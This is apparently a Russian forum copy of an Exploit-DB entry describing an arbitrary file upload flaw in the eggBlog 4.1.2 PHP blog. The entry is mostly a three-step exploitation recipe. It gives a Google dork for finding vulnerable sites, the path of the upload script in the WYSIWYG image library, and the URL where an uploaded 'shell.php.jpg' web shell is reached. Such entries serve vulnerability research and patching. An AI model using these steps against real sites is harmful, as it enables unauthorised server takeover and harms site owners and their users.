- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25126
- Проверка EDB
-
- Пройдено
- Автор
- POKK3RS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2013-05-01
Код:
# Exploit Title: eggBlog Arbitrary File Upload Vulnerability
# Google Dork:"powered by eggBlog.net"
# Date: 28/04/2013
# Exploit Author: Pokk3rs
# Vendor Homepage: http://eggblog.net/
# Software Link: http://sourceforge.net/projects/eggblog/files/eggBlog%204/v4.1.2/
# Tested on: Win8 Pro x64
Expl0itation
1 - Google Dork:"powered by eggBlog.net"
2 - http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
3 - http://server/[path]/photos/uploads/shell.php.jpg
#
- Источник
- www.exploit-db.com